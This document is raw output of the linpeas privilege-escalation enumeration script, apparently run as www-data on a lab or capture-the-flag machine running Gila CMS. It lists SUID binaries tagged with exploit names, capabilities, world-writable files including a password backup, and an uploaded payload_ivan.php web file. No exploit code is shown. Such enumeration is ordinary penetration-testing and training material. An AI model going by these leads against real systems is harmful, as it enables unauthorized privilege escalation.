-rwsr-xr-x 1 root root 139K Jan 28 2017 /bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 31K Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40K May 16 2018 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 40K May 16 2017 /bin/su
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 27K May 16 2018 /bin/umount ---> BSD/Linux(08-1996)
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 23K May 16 2017 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 61K May 16 2017 /usr/bin/chage
-rwxr-sr-x 1 root ssh 351K Mar 4 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27K May 16 2018 /usr/bin/wall
-rwxr-sr-x 1 root crontab 36K Apr 5 2016 /usr/bin/crontab
-rwxr-sr-x 1 root tty 15K Mar 1 2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root mlocate 39K Nov 17 2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 35K Apr 9 2018 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35K Apr 9 2018 /sbin/pam_extrausers_chkpwd
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
/etc/ld.so.conf.d/x86_64-linux-gnu_EGL.conf
/usr/lib/x86_64-linux-gnu/mesa-egl
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Parent Shell capabilities:
0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3310 Apr 12 2016 sbin.dhclient
-rw-r--r-- 1 root root 1793 Jan 21 2020 usr.sbin.mysqld
-rw-r--r-- 1 root root 1527 Jan 5 2016 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1469 Sep 8 2017 usr.sbin.tcpdump
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
╔══════════╣ Executable files potentially added by user (limit 70)
2020-02-06+18:54:07.1196134090 /opt/.password.bak
2020-02-06+18:28:50.0044226230 /var/www/html/assets/.htaccess
╔══════════╣ Unexpected in root
/initrd.img
/vmlinuz
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 16
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 89 root root 4096 Feb 13 2020 ..
-rw-r--r-- 1 root root 663 May 18 2016 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/var/www
/var/www/dev
/var/www/dev/index.html
/var/www/html
/var/www/html/composer.json
/var/www/html/index.php
/var/www/html/assets
/var/www/html/assets/.htaccess
/var/www/html/assets/gila-logo.png
/var/www/html/tmp
/var/www/html/tmp/.htaccess
/var/www/html/.htaccess
/var/www/html/sites
/var/www/html/sites/README.md
/var/www/html/app.yaml
/var/www/html/LICENSE
/var/www/html/log
/var/www/html/Dockerfile
/var/www/html/lib
/var/www/html/lib/prism
/var/www/html/lib/prism/prism.css
/var/www/html/lib/prism/prism.js
/var/www/html/lib/vue
/var/www/html/lib/vue/vue-editor.css
/var/www/html/lib/vue/vue.min.js
/var/www/html/lib/vue/vue-draggable.min.js
/var/www/html/lib/vue/vue-editor.js
/var/www/html/lib/CodeMirror
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/run/php
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/andre_backup.tar.gz
/var/log/syslog
/var/log/auth.log
logrotate 3.8.7
╔══════════╣ Files inside /home/www-data (limit 20)
╔══════════╣ Files inside others home (limit 20)
/var/www/dev/index.html
/var/www/html/composer.json
/var/www/html/index.php
/var/www/html/assets/.htaccess
/var/www/html/assets/payload_ivan.php
/var/www/html/assets/gila-logo.png
/var/www/html/tmp/.htaccess
/var/www/html/.htaccess
/var/www/html/sites/README.md
/var/www/html/app.yaml
/var/www/html/LICENSE
/var/www/html/log/error.log
/var/www/html/log/load.php
/var/www/html/log/sessions.log
/var/www/html/log/packages2update.json
/var/www/html/log/login.failed.log
/var/www/html/Dockerfile
/var/www/html/lib/prism/prism.css
/var/www/html/lib/prism/prism.js
/var/www/html/lib/vue/vue-editor.css
grep: write error: Broken pipe
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 161 Mar 14 10:08 /tmp/andre_backup.tar.gz
-rw-r--r-- 1 root root 7867 May 6 2015 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 298768 Dec 29 2015 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 10464 Feb 6 2020 /usr/share/info/dir.old
-rw-r--r-- 1 root root 755 Apr 7 2016 /usr/share/help-langpack/en_AU/deja-dup/backup-first.page
-rw-r--r-- 1 root root 974 Apr 7 2016 /usr/share/help-langpack/en_AU/deja-dup/backup-auto.page
-rw-r--r-- 1 root root 2018 Jun 21 2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-frequency.page
-rw-r--r-- 1 root root 1291 Jun 21 2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-why.page
-rw-r--r-- 1 root root 2392 Jun 21 2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-how.page
-rw-r--r-- 1 root root 2500 Jun 21 2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-what.page
-rw-r--r-- 1 root root 2295 Jun 21 2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-where.page
-rw-r--r-- 1 root root 1720 Jun 21 2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-check.page
-rw-r--r-- 1 root root 1422 Jun 21 2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-restore.page
-rw-r--r-- 1 root root 3073 Jun 21 2016 /usr/share/help-langpack/en_AU/ubuntu-help/backup-thinkabout.page
-rw-r--r-- 1 root root 2543 Jun 24 2016 /usr/share/help-langpack/en_GB/evolution/backup-restore.page
-rw-r--r-- 1 root root 755 Apr 7 2016 /usr/share/help-langpack/en_GB/deja-dup/backup-first.page
-rw-r--r-- 1 root root 974 Apr 7 2016 /usr/share/help-langpack/en_GB/deja-dup/backup-auto.page
-rw-r--r-- 1 root root 2020 Jun 21 2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-frequency.page
-rw-r--r-- 1 root root 1291 Jun 21 2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-why.page
-rw-r--r-- 1 root root 2371 Jun 21 2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-how.page
-rw-r--r-- 1 root root 2503 Jun 21 2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-what.page
-rw-r--r-- 1 root root 2289 Jun 21 2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-where.page
-rw-r--r-- 1 root root 1720 Jun 21 2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-check.page
-rw-r--r-- 1 root root 1420 Jun 21 2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-restore.page
-rw-r--r-- 1 root root 3067 Jun 21 2016 /usr/share/help-langpack/en_GB/ubuntu-help/backup-thinkabout.page
-rw-r--r-- 1 root root 2034 Jun 21 2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-frequency.page
-rw-r--r-- 1 root root 1298 Jun 21 2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-why.page
-rw-r--r-- 1 root root 2418 Jun 21 2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-how.page
-rw-r--r-- 1 root root 2530 Jun 21 2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-what.page
-rw-r--r-- 1 root root 2308 Jun 21 2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-where.page
-rw-r--r-- 1 root root 1732 Jun 21 2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-check.page
-rw-r--r-- 1 root root 1427 Jun 21 2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-restore.page
-rw-r--r-- 1 root root 3094 Jun 21 2016 /usr/share/help-langpack/en_CA/ubuntu-help/backup-thinkabout.page
-rw-r--r-- 1 root root 35792 May 8 2018 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 190591 Jan 16 2019 /usr/src/linux-headers-4.4.0-142-generic/.config.old
-rw-r--r-- 1 root root 0 Jan 16 2019 /usr/src/linux-headers-4.4.0-142-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Jan 16 2019 /usr/src/linux-headers-4.4.0-142-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 3020 Feb 6 2020 /etc/apt/sources.bak
-rw-r--r-- 1 root root 610 Feb 6 2020 /etc/xml/catalog.old
-rw-r--r-- 1 root root 673 Feb 6 2020 /etc/xml/xml-core.xml.old
-rwxrwxrwx 1 root root 36 Feb 6 2020 /opt/.password.bak
-rwxrwxrwx 1 root root 866 Jul 10 2019 /var/www/html/src/core/views/admin/db_backup.php
-rwxrwxrwx 1 root root 3773 Jul 10 2019 /var/www/html/src/core/classes/db_backup.php
-rw-r--r-- 1 root root 128 Feb 6 2020 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 9038 Jan 16 2019 /lib/modules/4.4.0-142-generic/kernel/drivers/power/wm831x_backup.ko
-rw-r--r-- 1 root root 9070 Jan 16 2019 /lib/modules/4.4.0-142-generic/kernel/drivers/net/team/team_mode_activebackup.ko
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/mlocate/mlocate.db: regular file, no read permission
╔══════════╣ Web files?(output limit)
/var/www/:
total 16K
drwxr-xr-x 4 root root 4.0K Feb 6 2020 .
drwxr-xr-x 12 root root 4.0K Feb 6 2020 ..
drwxr-xr-x 2 root root 4.0K Feb 6 2020 dev
drwxrwxrwx 9 root root 4.0K Feb 13 2020 html
/var/www/dev:
total 12K
drwxr-xr-x 2 root root 4.0K Feb 6 2020 .
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 220 Aug 31 2015 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 1391 Feb 6 2020 /etc/apparmor.d/cache/.features
-rw------- 1 root root 0 Feb 26 2019 /etc/.pwd.lock
-rwxrwxrwx 1 root root 36 Feb 6 2020 /opt/.password.bak
-rw-r--r-- 1 root root 0 Mar 14 09:22 /run/network/.ifstate.lock
-rwxrwxrwx 1 root root 1 Feb 6 2020 /var/www/html/assets/.htaccess
-rwxrwxrwx 1 root root 37 Jul 10 2019 /var/www/html/tmp/.htaccess
-rwxrwxrwx 1 root root 1065 Jul 10 2019 /var/www/html/.htaccess
-rwxrwxrwx 1 root root 37 Jul 10 2019 /var/www/html/lib/.htaccess
-rwxrwxrwx 1 root root 37 Jul 10 2019 /var/www/html/src/.htaccess
-rwxrwxrwx 1 root root 1 Jul 10 2019 /var/www/html/src/core/widgets/.htaccess
-rwxrwxrwx 1 root root 37 Jul 10 2019 /var/www/html/themes/.htaccess
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 161 Mar 14 10:08 /tmp/andre_backup.tar.gz
-rwxrwxrwx 1 www-data www-data 828098 Feb 10 12:38 /tmp/linpeas.sh
-rw-r--r-- 1 root root 16930 Feb 6 2020 /var/backups/apt.extended_states.0
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/opt/.password.bak
/run/lock
/run/lock/apache2
/run/php
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/tmp
/var/www/html
/var/www/html/.htaccess
/var/www/html/Dockerfile
/var/www/html/LICENSE
/var/www/html/app.yaml
/var/www/html/assets
/var/www/html/assets/.htaccess
/var/www/html/assets/payload_ivan.php
/var/www/html/composer.json
/var/www/html/config.default.php
/var/www/html/config.php
/var/www/html/index.php
/var/www/html/lib
/var/www/html/lib/.htaccess
/var/www/html/lib/CodeMirror
/var/www/html/lib/CodeMirror/codemirror.css
/var/www/html/lib/CodeMirror/codemirror.js
/var/www/html/lib/CodeMirror/css.js
/var/www/html/lib/CodeMirror/htmlmixed.js
/var/www/html/lib/CodeMirror/javascript.js
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/lib/bootstrap
/var/www/html/lib/bootstrap/bootstrap.min.css
/var/www/html/lib/bootstrap/bootstrap.min.js
/var/www/html/lib/font-awesome
/var/www/html/lib/font-awesome/css
/var/www/html/lib/font-awesome/css/font-awesome.min.css
/var/www/html/lib/font-awesome/fonts
/var/www/html/lib/font-awesome/fonts/fontawesome-webfont.woff
/var/www/html/lib/font-awesome/fonts/fontawesome-webfont.woff2
/var/www/html/lib/gila.min.css
/var/www/html/lib/gila.min.js
/var/www/html/lib/jquery
/var/www/html/lib/jquery/jquery-3.3.1.min.js
/var/www/html/lib/jquery/jquery-sortable.js
/var/www/html/lib/prism
/var/www/html/lib/prism/prism.css
/var/www/html/lib/prism/prism.js
/var/www/html/lib/select2
/var/www/html/lib/select2/select2.min.css
/var/www/html/lib/select2/select2.min.js
/var/www/html/lib/slick
/var/www/html/lib/slick/fonts
/var/www/html/lib/slick/fonts/slick.eot
/var/www/html/lib/slick/fonts/slick.ttf
/var/www/html/lib/slick/fonts/slick.woff
/var/www/html/lib/slick/slick-theme.css
/var/www/html/lib/slick/slick.css
/var/www/html/lib/slick/slick.min.js
/var/www/html/lib/tinymce
/var/www/html/lib/tinymce/jquery.tinymce.min.js
/var/www/html/lib/tinymce/langs
/var/www/html/lib/tinymce/langs/readme.md
/var/www/html/lib/tinymce/license.txt
/var/www/html/lib/tinymce/plugins
/var/www/html/lib/tinymce/plugins/advlist
/var/www/html/lib/tinymce/plugins/advlist/plugin.min.js
/var/www/html/lib/tinymce/plugins/anchor
/var/www/html/lib/tinymce/plugins/anchor/plugin.min.js
/var/www/html/lib/tinymce/plugins/autolink
/var/www/html/lib/tinymce/plugins/autolink/plugin.min.js
/var/www/html/lib/tinymce/plugins/autoresize
/var/www/html/lib/tinymce/plugins/autoresize/plugin.min.js
/var/www/html/lib/tinymce/plugins/autosave
/var/www/html/lib/tinymce/plugins/autosave/plugin.min.js
/var/www/html/lib/tinymce/plugins/bbcode
/var/www/html/lib/tinymce/plugins/bbcode/plugin.min.js
/var/www/html/lib/tinymce/plugins/charmap
/var/www/html/lib/tinymce/plugins/charmap/plugin.min.js
/var/www/html/lib/tinymce/plugins/code
/var/www/html/lib/tinymce/plugins/code/plugin.min.js
/var/www/html/lib/tinymce/plugins/codesample
/var/www/html/lib/tinymce/plugins/codesample/css
/var/www/html/lib/tinymce/plugins/codesample/css/prism.css
/var/www/html/lib/tinymce/plugins/codesample/plugin.min.js
/var/www/html/lib/tinymce/plugins/colorpicker
/var/www/html/lib/tinymce/plugins/colorpicker/plugin.min.js
/var/www/html/lib/tinymce/plugins/contextmenu
/var/www/html/lib/tinymce/plugins/contextmenu/plugin.min.js
/var/www/html/lib/tinymce/plugins/directionality
/var/www/html/lib/tinymce/plugins/directionality/plugin.min.js
/var/www/html/lib/tinymce/plugins/emoticons
/var/www/html/lib/tinymce/plugins/emoticons/img
/var/www/html/lib/tinymce/plugins/emoticons/plugin.min.js
/var/www/html/lib/tinymce/plugins/fullpage
/var/www/html/lib/tinymce/plugins/fullpage/plugin.min.js
/var/www/html/lib/tinymce/plugins/fullscreen
/var/www/html/lib/tinymce/plugins/fullscreen/plugin.min.js
/var/www/html/lib/tinymce/plugins/help
/var/www/html/lib/tinymce/plugins/help/img
/var/www/html/lib/tinymce/plugins/help/plugin.min.js
/var/www/html/lib/tinymce/plugins/hr
/var/www/html/lib/tinymce/plugins/hr/plugin.min.js
/var/www/html/lib/tinymce/plugins/image
/var/www/html/lib/tinymce/plugins/image/plugin.min.js
/var/www/html/lib/tinymce/plugins/imagetools
/var/www/html/lib/tinymce/plugins/imagetools/plugin.min.js
/var/www/html/lib/tinymce/plugins/importcss
/var/www/html/lib/tinymce/plugins/importcss/plugin.min.js
/var/www/html/lib/tinymce/plugins/insertdatetime
/var/www/html/lib/tinymce/plugins/insertdatetime/plugin.min.js
/var/www/html/lib/tinymce/plugins/legacyoutput
/var/www/html/lib/tinymce/plugins/legacyoutput/plugin.min.js
/var/www/html/lib/tinymce/plugins/link
/var/www/html/lib/tinymce/plugins/link/plugin.min.js
/var/www/html/lib/tinymce/plugins/lists
/var/www/html/lib/tinymce/plugins/lists/plugin.min.js
/var/www/html/lib/tinymce/plugins/media
/var/www/html/lib/tinymce/plugins/media/plugin.min.js
/var/www/html/lib/tinymce/plugins/nonbreaking
/var/www/html/lib/tinymce/plugins/nonbreaking/plugin.min.js
/var/www/html/lib/tinymce/plugins/noneditable
/var/www/html/lib/tinymce/plugins/noneditable/plugin.min.js
/var/www/html/lib/tinymce/plugins/pagebreak
/var/www/html/lib/tinymce/plugins/pagebreak/plugin.min.js
/var/www/html/lib/tinymce/plugins/paste
/var/www/html/lib/tinymce/plugins/paste/plugin.min.js
/var/www/html/lib/tinymce/plugins/preview
/var/www/html/lib/tinymce/plugins/preview/plugin.min.js
/var/www/html/lib/tinymce/plugins/print
/var/www/html/lib/tinymce/plugins/print/plugin.min.js
/var/www/html/lib/tinymce/plugins/save
/var/www/html/lib/tinymce/plugins/save/plugin.min.js
/var/www/html/lib/tinymce/plugins/searchreplace
/var/www/html/lib/tinymce/plugins/searchreplace/plugin.min.js
/var/www/html/lib/tinymce/plugins/spellchecker
/var/www/html/lib/tinymce/plugins/spellchecker/plugin.min.js
/var/www/html/lib/tinymce/plugins/tabfocus
/var/www/html/lib/tinymce/plugins/tabfocus/plugin.min.js
/var/www/html/lib/tinymce/plugins/table
/var/www/html/lib/tinymce/plugins/table/plugin.min.js
/var/www/html/lib/tinymce/plugins/template
/var/www/html/lib/tinymce/plugins/template/plugin.min.js
/var/www/html/lib/tinymce/plugins/textcolor
/var/www/html/lib/tinymce/plugins/textcolor/plugin.min.js
/var/www/html/lib/tinymce/plugins/textpattern
/var/www/html/lib/tinymce/plugins/textpattern/plugin.min.js
/var/www/html/lib/tinymce/plugins/toc
/var/www/html/lib/tinymce/plugins/toc/plugin.min.js
/var/www/html/lib/tinymce/plugins/visualblocks
/var/www/html/lib/tinymce/plugins/visualblocks/css
/var/www/html/lib/tinymce/plugins/visualblocks/css/visualblocks.css
/var/www/html/lib/tinymce/plugins/visualblocks/plugin.min.js
/var/www/html/lib/tinymce/plugins/visualchars
/var/www/html/lib/tinymce/plugins/visualchars/plugin.min.js
/var/www/html/lib/tinymce/plugins/wordcount
/var/www/html/lib/tinymce/plugins/wordcount/plugin.min.js
/var/www/html/lib/tinymce/skins
/var/www/html/lib/tinymce/skins/lightgray
/var/www/html/lib/tinymce/skins/lightgray/content.inline.min.css
/var/www/html/lib/tinymce/skins/lightgray/content.min.css
/var/www/html/lib/tinymce/skins/lightgray/content.mobile.min.css
/var/www/html/lib/tinymce/skins/lightgray/fonts
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce-mobile.woff
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce-small.eot
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce-small.ttf
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce-small.woff
/var/www/html/lib/tinymce/skins/lightgray/fonts/tinymce.eot
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/lib/tinymce/skins/lightgray/img
/var/www/html/lib/tinymce/skins/lightgray/skin.min.css
/var/www/html/lib/tinymce/skins/lightgray/skin.mobile.min.css
/var/www/html/lib/tinymce/themes
/var/www/html/lib/tinymce/themes/modern
/var/www/html/lib/tinymce/themes/modern/theme.min.js
/var/www/html/lib/tinymce/tinymce.min.js
/var/www/html/lib/vue
/var/www/html/lib/vue/vue-draggable.min.js
/var/www/html/lib/vue/vue-editor.css
/var/www/html/lib/vue/vue-editor.js
/var/www/html/lib/vue/vue.min.js
/var/www/html/log
/var/www/html/log/error.log
/var/www/html/log/load.php
/var/www/html/log/login.failed.log
/var/www/html/log/packages2update.json
/var/www/html/log/sessions.log
/var/www/html/robots.txt
/var/www/html/sites
/var/www/html/sites/README.md
/var/www/html/src
/var/www/html/src/.htaccess
/var/www/html/src/Cocur
/var/www/html/src/Cocur/Slugify
/var/www/html/src/Cocur/Slugify/LICENSE
/var/www/html/src/Cocur/Slugify/Resources
/var/www/html/src/Cocur/Slugify/Resources/rules
/var/www/html/src/Cocur/Slugify/Resources/rules/arabic.json
/var/www/html/src/Cocur/Slugify/Resources/rules/austrian.json
/var/www/html/src/Cocur/Slugify/Resources/rules/azerbaijani.json
/var/www/html/src/Cocur/Slugify/Resources/rules/bulgarian.json
/var/www/html/src/Cocur/Slugify/Resources/rules/burmese.json
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/Cocur/Slugify/RuleProvider
/var/www/html/src/Cocur/Slugify/RuleProvider/DefaultRuleProvider.php
/var/www/html/src/Cocur/Slugify/RuleProvider/FileRuleProvider.php
/var/www/html/src/Cocur/Slugify/RuleProvider/RuleProviderInterface.php
/var/www/html/src/Cocur/Slugify/Slugify.php
/var/www/html/src/Cocur/Slugify/SlugifyInterface.php
/var/www/html/src/Cocur/Slugify/bin
/var/www/html/src/Cocur/Slugify/bin/generate-default.php
/var/www/html/src/blog
/var/www/html/src/blog/controllers
/var/www/html/src/blog/controllers/blog.php
/var/www/html/src/blog/load.php
/var/www/html/src/blog/package.json
/var/www/html/src/blog/views
/var/www/html/src/blog/views/blog-homepage.php
/var/www/html/src/core
/var/www/html/src/core/assets
/var/www/html/src/core/assets/admin
/var/www/html/src/core/assets/admin/content.css
/var/www/html/src/core/assets/admin/content.js
/var/www/html/src/core/assets/admin/listcomponent.js
/var/www/html/src/core/assets/admin/media.js
/var/www/html/src/core/assets/admin/style.css
/var/www/html/src/core/assets/cdn_paths.php
/var/www/html/src/core/assets/lazyImgLoad.js
/var/www/html/src/core/bootstrap.php
/var/www/html/src/core/classes
/var/www/html/src/core/classes/cache.php
/var/www/html/src/core/classes/controller.php
/var/www/html/src/core/classes/db.php
/var/www/html/src/core/classes/db_backup.php
/var/www/html/src/core/classes/event.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/core/controllers
/var/www/html/src/core/controllers/admin.php
/var/www/html/src/core/controllers/api.php
/var/www/html/src/core/controllers/cm.php
/var/www/html/src/core/controllers/fm.php
/var/www/html/src/core/controllers/login.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/core/install
/var/www/html/src/core/install/index.php
/var/www/html/src/core/install/install.form.php
/var/www/html/src/core/install/install.php
/var/www/html/src/core/install/install.sql.php
/var/www/html/src/core/install/installed.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/core/lang
/var/www/html/src/core/lang/admin
/var/www/html/src/core/lang/admin/el.json
/var/www/html/src/core/lang/admin/en.json
/var/www/html/src/core/lang/admin/es.json
/var/www/html/src/core/lang/admin/et.json
/var/www/html/src/core/lang/admin/fr.json
/var/www/html/src/core/lang/content
/var/www/html/src/core/lang/content/el.js
/var/www/html/src/core/lang/content/en.js
/var/www/html/src/core/lang/content/es.js
/var/www/html/src/core/lang/content/fr.js
/var/www/html/src/core/lang/de.json
/var/www/html/src/core/lang/el.json
/var/www/html/src/core/lang/en.json
/var/www/html/src/core/lang/es.json
/var/www/html/src/core/lang/et.json
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/core/lang/login/de.json
/var/www/html/src/core/lang/login/el.json
/var/www/html/src/core/lang/login/en.json
/var/www/html/src/core/lang/login/es.json
/var/www/html/src/core/lang/login/et.json
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/core/lang/myprofile
/var/www/html/src/core/lang/myprofile/en.json
/var/www/html/src/core/lang/myprofile/es.json
/var/www/html/src/core/lang/myprofile/fr.json
/var/www/html/src/core/lang/permissions
/var/www/html/src/core/lang/permissions/el.json
/var/www/html/src/core/lang/permissions/en.json
/var/www/html/src/core/lang/permissions/es.json
/var/www/html/src/core/lang/permissions/et.json
/var/www/html/src/core/lang/permissions/fr.json
/var/www/html/src/core/lib
/var/www/html/src/core/lib/gila.min.css
/var/www/html/src/core/lib/gila.min.js
/var/www/html/src/core/lib/vue-draggable.min.js
/var/www/html/src/core/load.php
/var/www/html/src/core/models
/var/www/html/src/core/models/menu.php
/var/www/html/src/core/models/page.php
/var/www/html/src/core/models/post.php
/var/www/html/src/core/models/profile.php
/var/www/html/src/core/models/user.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/core/package.json
/var/www/html/src/core/tables
/var/www/html/src/core/tables/page.php
/var/www/html/src/core/tables/post.php
/var/www/html/src/core/tables/postcategory.php
/var/www/html/src/core/tables/user-post.php
/var/www/html/src/core/tables/user.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/core/update.php
/var/www/html/src/core/views
/var/www/html/src/core/views/404.php
/var/www/html/src/core/views/admin
/var/www/html/src/core/views/admin/content-vue.php
/var/www/html/src/core/views/admin/contenttype.php
/var/www/html/src/core/views/admin/dashboard.php
/var/www/html/src/core/views/admin/db_backup.php
/var/www/html/src/core/views/admin/edit_widget.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/core/views/blog-author.php
/var/www/html/src/core/views/blog-category.php
/var/www/html/src/core/views/blog-feed.php
/var/www/html/src/core/views/blog-list.php
/var/www/html/src/core/views/blog-search.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/src/core/views/tpl/menu.bootstrap.php
/var/www/html/src/core/views/tpl/menu.php
/var/www/html/src/core/widgets
/var/www/html/src/core/widgets/.htaccess
/var/www/html/src/core/widgets/_widget_example
/var/www/html/src/core/widgets/_widget_example/_widget_example.php
/var/www/html/src/core/widgets/_widget_example/widget.php
/var/www/html/src/core/widgets/category-post
/var/www/html/src/core/widgets/category-post/category-post.php
/var/www/html/src/core/widgets/category-post/style.css
/var/www/html/src/core/widgets/category-post/widget.php
/var/www/html/src/core/widgets/contact-form
/var/www/html/src/core/widgets/contact-form/contact-form.php
/var/www/html/src/core/widgets/contact-form/widget.php
/var/www/html/src/core/widgets/features
/var/www/html/src/core/widgets/features/features.php
/var/www/html/src/core/widgets/features/widget.php
/var/www/html/src/core/widgets/gallery
/var/www/html/src/core/widgets/gallery/gallery.php
/var/www/html/src/core/widgets/gallery/widget.php
/var/www/html/src/core/widgets/image
/var/www/html/src/core/widgets/image/image.php
/var/www/html/src/core/widgets/image/widget.php
/var/www/html/src/core/widgets/latest-post
/var/www/html/src/core/widgets/latest-post/latest-post.php
/var/www/html/src/core/widgets/latest-post/widget.php
/var/www/html/src/core/widgets/links
/var/www/html/src/core/widgets/links/links.php
/var/www/html/src/core/widgets/links/widget.php
/var/www/html/src/core/widgets/paragraph
/var/www/html/src/core/widgets/paragraph/paragraph.php
/var/www/html/src/core/widgets/paragraph/widget.php
/var/www/html/src/core/widgets/post-categories
/var/www/html/src/core/widgets/post-categories/post-categories.php
/var/www/html/src/core/widgets/post-categories/widget.php
/var/www/html/src/core/widgets/social-icons
/var/www/html/src/core/widgets/social-icons/social-icons.php
/var/www/html/src/core/widgets/social-icons/widget.php
/var/www/html/src/core/widgets/tag
/var/www/html/src/core/widgets/tag/tag.php
/var/www/html/src/core/widgets/tag/widget.php
/var/www/html/src/core/widgets/text
/var/www/html/src/core/widgets/text/text.php
/var/www/html/src/core/widgets/text/widget.php
/var/www/html/src/featured_grid
/var/www/html/src/featured_grid/assets
